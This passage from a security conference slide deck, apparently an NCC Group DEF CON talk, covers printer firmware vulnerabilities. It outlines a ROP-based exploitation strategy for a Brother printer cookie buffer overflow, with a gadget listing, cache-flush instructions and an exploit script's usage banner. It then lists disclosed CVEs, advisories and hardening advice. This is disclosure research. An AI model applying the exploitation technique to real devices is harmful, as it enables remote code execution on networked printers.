0x0000000000009eb4 : adds r4, #0x61 ; adds r4, r0, #1 ; b #0xa346 ; strh r2, [r3, r5] ; str r6, [sp, #0x14c] ; stm r5!, {r0, r4, r6} ; pop {r2, r4, r5, r6, pc}
- SNIP -
CVE-2019-13193: Buffer Overflow in Cookie Values
"Debug Information Exposed": http://printer/httpd/diag/url_list.html

  • 56. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Approach: use the ROP gadgets found to write a shellcode into RWX memory (e.g. PNG files) and jump to it.
Instruction and Data CACHES!
Some options to flush the cache:
 ARM instructions: MOV r0, #0 + MCR p15, 0, r0, c7, c5, 0 ; Clear r0 + Flush entire
 Sleep(), mprotect(), etc. calls
 Continue the execution flow (harder, but the most “professional” option)

  • 57. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Continuing the execution flow:
1) ROP (part 1) should execute our payload
2) ROP (part 2) should change the address (within the stack) that overwrites PC once the bug is triggered, with a valid function address (e.g. func 1.1.1)
3) ROP (part 3) should align the SP to the previous state, just before triggering the bug.
4) Trigger the vuln as many times as you want
Task Stack Frames (diagram): Func. 1 (SP = 0x1000) → Func. 1.1 (SP = 0x900) → Func. 1.1.1 (SP = 0x700) → Vuln. Func (SP = 0x550) → ....; other SP values shown: 0x5000, 0x4000, 0x3000, 0x17c0

  • 58. CVE-2019-13193: Buffer Overflow in Cookie Values
Stack Buffer Overflow – The tricky case
DEMO
$ python exploit-persepolis-v2.py
[*] (ASCII-art banner) Printer buffer overflow exploit (Persepolis)
[*] Author: Daniel Romero (NCC Group)
[*] Firm ver: [REDACTED]
[*]
[*] Usage: ./exploit-persepolis-v2.py write [BYTES_TO_BE_WRITTEN] [JUMP TO SHELLCODE Y/N]
[*]        ./exploit-persepolis-v2.py writefile [FILE_PATH]
[*]        ./exploit-persepolis-v2.py read [SOURCE_ADDRESS] [SIZE]
[*]
  • 60. Responsible Vulnerability Disclosure
 We started this process in February!
 Mixed response from the printer manufacturers
 Some had very mature vulnerability disclosure procedures
 Some others did not have any process for this; 2 months stuck trying to contact some of them
 All have published patches solving most of the issues by now
 Security advisories already published:
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-lexmark-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-hp-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-brother-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-ricoh-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/
 https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-kyocera-printers/

  • 62. CVE List
HP
 CVE-2019-6323 Reflected Cross-Site Scripting
 CVE-2019-6324 Stored Cross-Site Scripting
 CVE-2019-6325 Cross-Site Request Forgery
 CVE-2019-6326 Multiple Buffer Overflow in Web
 CVE-2019-6327 Multiple Buffer Overflow in IPP
Lexmark
 CVE-2019-9930 Multiple Buffer Overflows in Web
 CVE-2019-9931 SNMP Denial of Service Vulnerability
 CVE-2019-9932 Multiple Buffer Overflows in Web
 CVE-2019-9933 Multiple Buffer Overflows in Web
 CVE-2019-9934 Information Disclosure Vulnerabilities
 CVE-2019-9935 Information Disclosure Vulnerabilities
 CVE-2019-10057 Cross-Site Request Forgery
 CVE-2019-10058 No Account Lockout Implemented
 CVE-2019-10059 Information Disclosure Vulnerability
Xerox
 CVE-2019-13165 Multiple Buffer Overflow in IPP
 CVE-2019-13166 No Account Lockout Implemented
 CVE-2019-13167 Multiple Stored Cross-Site Scripting
 CVE-2019-13168 Multiple Buffer Overflow in IPP
 CVE-2019-13169 Buffer Overflow in HTTP Headers
 CVE-2019-13170 Cross-Site Request Forgery
 CVE-2019-13171 Buffer Overflow in Google Cloud Print Implementation
 CVE-2019-13172 Buffer Overflow in Authentication Cookie
Brother
 CVE-2019-13192 Heap Overflow in IPP Attribute Names
 CVE-2019-13193 Stack Buffer Overflow in Cookie Values
 CVE-2019-13194 Information Disclosure Vulnerability in Web Server
Kyocera
 CVE-2019-13195 Path Traversal in Web Server
 CVE-2019-13196 Multiple Buffer Overflow in Web Server (1)
 CVE-2019-13197 Multiple Buffer Overflow in Web Server (2)
 CVE-2019-13198 Stored Cross-Site Scripting
 CVE-2019-13199 Lack of Cross-Site Request Forgery Countermeasures
 CVE-2019-13200 Reflected Cross-Site Scripting
 CVE-2019-13201 Buffer Overflow in LPD Service
 CVE-2019-13202 Multiple Buffer Overflow in Web Server (3)
 CVE-2019-13203 Integer Overflow in Web Server
 CVE-2019-13204 Multiple Buffer Overflow in IPP Service
 CVE-2019-13205 Broken Access Controls in Web Server
 CVE-2019-13206 Multiple Buffer Overflow in Web Server (4)
Ricoh
 CVE-2019-14299 No Account Lockout Implemented
 CVE-2019-14300 Buffer Overflow in HTTP Headers
 CVE-2019-14301 Information Disclosure Vulnerability in Web Server
 CVE-2019-14302 Hardware Debug Exposed
 CVE-2019-14303 Denial of Service with LPD Command
 CVE-2019-14304 Cross-Site Request Forgery
 CVE-2019-14305 Multiple Buffer Overflows in Web Application
 CVE-2019-14306 Broken Access Controls
 CVE-2019-14307 Denial of Service Setting SNMP Values
 CVE-2019-14308 Buffer Overflow in LPD Service
 CVE-2019-14309 FTP Hardcoded Credentials
 CVE-2019-14310 Buffer Overflow in IPP Service (1)
 CVE-2019-14311 Buffer Overflow in IPP Service (2)
  • 63. Impact of the Research & Conclusions
 Common office devices present in all organizations
 Very immature state of security
 Largely ignored in most organizations
 Large number of critical and high risk issues in 6 of 6 printers tested
 Functional PoC unauthenticated RCE exploits for 4 of them (we ran out of time)
 50 CVEs
 We stopped searching after a few vulnerabilities… there are probably more
 We only looked at a small part of the attack surface… there is a lot more
 The first researcher who takes a look will likely hit the jackpot!
 Shared code between different products of the same vendors
 Huge number of devices affected

  • 64. Recommendations
For printer manufacturers:
 Security in the product development life cycle
 Assess your products!
 Hardware
 Services
 Code
 Review your vulnerability disclosure procedures
For hackers:
 Give it a try!
 There are vulnerabilities waiting for you
 A lot to learn, and a lot of FUN!
For organizations:
 Start by considering them as threats!
 Inventory of all makes, models and firmware versions
 Ensure that the firmware is updated as you do for any other asset!
 Perform hardening of the printers' config, removing unnecessary services, etc.

  • 65. What about the Internet?
As expected... there was a large number of these printers connected to the Internet! And... are different manufacturers using the same code?

  • 66. Acknowledgments!
The research was performed at NCC Group, which gave us the time and resources needed for it. Thanks to all the Madrid office, Matt Lewis and Phillip Moss for their support, giving us ideas and helping us with the talk. And last but not least… we would like to thank Álvaro Felipe (@alvaro_fe), who took part in this research during the first days and helped us with great ideas during the exploitation phases.

  • 67. Thank you for suffering us
Daniel Romero @daniel_rome
Mario Rivas @grifo
Achievement Unlocked! Talk at DEF CON!